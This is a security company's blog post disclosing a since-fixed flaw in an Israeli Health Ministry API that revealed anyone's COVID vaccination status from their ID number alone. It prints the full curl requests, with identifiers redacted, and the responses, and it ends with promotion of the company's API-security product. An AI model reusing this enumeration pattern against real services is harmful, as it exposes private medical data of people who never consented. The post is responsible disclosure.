Home Resources Blog API Vulnerability Exposes COVID Vaccination Status of All Israeli Citizens
API Security

API Vulnerability Exposes COVID Vaccination Status of All Israeli Citizens

Shalom Carmel Chief Information Officer at GlobalDots
17th August, 2021 3 Min read

Returning from my vacation abroad, I had to fill out a COVID declaration form on the Israeli Health Ministry website. Something looked weird when I filled it out on my mobile: It was too quick to indicate that I’m vaccinated, and this output came up even with a typo in my passport number. Hence I decided to take a closer look at that form’s APIs.

One of the endpoints there took in an ID number, first name, last name, passport number and session ID, and returned my vaccination status with an expiry date.

How One AI-Driven Media Platform Cut EBS Costs for AWS ASGs by 48%

How One AI-Driven Media Platform Cut EBS Costs for AWS ASGs by 48%

That API endpoint was off; as it turns out, I could redact all fields except my (or any) ID number and still get the vaccination status back. Meaning, all I needed in order to know someone’s vaccine status was their ID number. 

In Israel, ID numbers are considered a very weak and hardly-private PII: Unlike social security numbers, you use your ID almost anywhere – including payment providers, point-of-sale etc. Also, databases containing data on most of Israel’s population have leaked in the past. So, theoretically, if I had that ID database, I could fetch and download the vaccine data of all Israeli citizens, one ID at a time, within a day or so. However, unlike ID numbers, vaccination status is medical information, which is obviously considered private and should be treated as such. Hence I immediately contacted the Israeli Ministry of Health to fix that endpoint.

Below are the full API requests that yielded the vaccination data.

API Response: Non-Vaccinated ID

url 'https://corona.health.gov.il/api/corona/flight/certificate/check' \
  -H 'Connection: keep-alive' \
  -H 'Cache-Control: no-cache' \
  -H 'sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"' \
  -H 'X-PHONE-NUMBER: +97250xxxxx' \
  -H 'Accept-Language: he' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Accept: application/json' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'X-PASSPORT-NUMBER: 1231231231' \
  -H 'X-USER-ID: 0xxxxxxx' \
  -H 'Origin: https://corona.health.gov.il' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Referer: https://corona.health.gov.il/flights/' \
  --data-raw 'IDType=1&IDNum=xxxxxxx \
 --compressed

Output:

{
  "CovidStatusResponse": {
    "Result": {
      "StatusCode": "CompletSuccessfully",
      "StatusDesc": "CompletSuccessfully"
    },
    "ExpirationDate": null,
    "CertificateEligibilityType": 0
  }
}

API Response: Vaccinated IDs

curl 'https://corona.health.gov.il/api/corona/flight/certificate/check' \
  -H 'Connection: keep-alive' \
  -H 'Cache-Control: no-cache' \
  -H 'sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"' \
  -H 'X-PHONE-NUMBER: +97250xxxxx' \
  -H 'Accept-Language: he' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Accept: application/json' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'X-PASSPORT-NUMBER: 1231231231' \
  -H 'X-USER-ID: 0xxxxxxx' \
  -H 'Origin: https://corona.health.gov.il' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Referer: https://corona.health.gov.il/flights/' \
  --data-raw 'IDType=1&IDNum=xxxxxxxx' \
  --compressed

Output:

{
  "CovidStatusResponse": {
    "Result": {
      "StatusCode": "CompletSuccessfully",
      "StatusDesc": "CompletSuccessfully"
    },
    "ExpirationDate": "2021-12-31T23:59:59",
    "CertificateEligibilityType": 2
  }
}

Notes & Conclusion

First and foremost, I want to thank gov.il’s security team for acknowledging and mitigating the vulnerability in record time.

It is important to note that we see these vulnerabilities on a daily basis, and that is also the main reason our API Security solutions use big data and anomaly detection instead of API schema validation and static rate limits. Our solutions learn how our APIs behave and trigger an automated response once we spot an anomaly. In the case I described above, the anomaly would trigger once we saw that the endpoint responded without fields that should be there according to what we learned from traffic to that endpoint.

At GlobalDots, we see API security as key component of a proper web security stack. As such, we equip our customers with the API security solutions which fit them best – and which we believe to be the spearhead of this evolving category.

Contact us for more information.  

Latest Articles

API Security
A CISO’s Essential Guide to API Security

Learn how to reduce the business risk of API attacks – and maximize the value of digital innovation.  APIs are the entry point to your organization’s most critical data and services. Their protection is crucial to reduce risks, maximize program value, and generate growth. In this guide, we take a close look at the special […]

Ganesh The Awesome Senior Pre & Post-Sales Engineer at GlobalDots
15th September, 2022
API Security
How to Mitigate the Top 11 API Security Risks

What is an API? API is an acronym for an application programming interface. It is a set of rules that allow software programs to communicate. In the business world, APIs are important because they allow companies to share data and functions. It allows businesses to automate tasks and improve communication between departments.  API also allows […]

Shalom Carmel Chief Information Officer at GlobalDots
6th February, 2022
API Security
Top Strategies for API Security

The explosion of consumer mobile adoption, digitization of goods and services, and an increase in data generation have driven a change in the way Internet-based businesses are built and consumed. The digital economy has prompted online organizations to facilitate the creation and exchange of information to new channels, partners, and developers with the goal of […]

Ganesh The Awesome Senior Pre & Post-Sales Engineer at GlobalDots
8th April, 2021
Back to Resources

Unlock Your Cloud Potential

Schedule a call with our experts. Discover new technology and get recommendations to improve your performance.

    GlobalDots' industry expertise proactively addressed structural inefficiencies that would have otherwise hindered our success. Their laser focus is why I would recommend them as a partner to other companies

    Marco Kaiser
    Marco Kaiser

    CTO

    Legal Services

    GlobalDots has helped us to scale up our innovative capabilities, and in significantly improving our service provided to our clients

    Antonio Ostuni
    Antonio Ostuni

    CIO

    IT Services

    It's common for 3rd parties to work with a limited number of vendors - GlobalDots and its multi-vendor approach is different. Thanks to GlobalDots vendors umbrella, the hybrid-cloud migration was exceedingly smooth

    Motti Shpirer
    Motti Shpirer

    VP of Infrastructure & Technology

    Advertising Services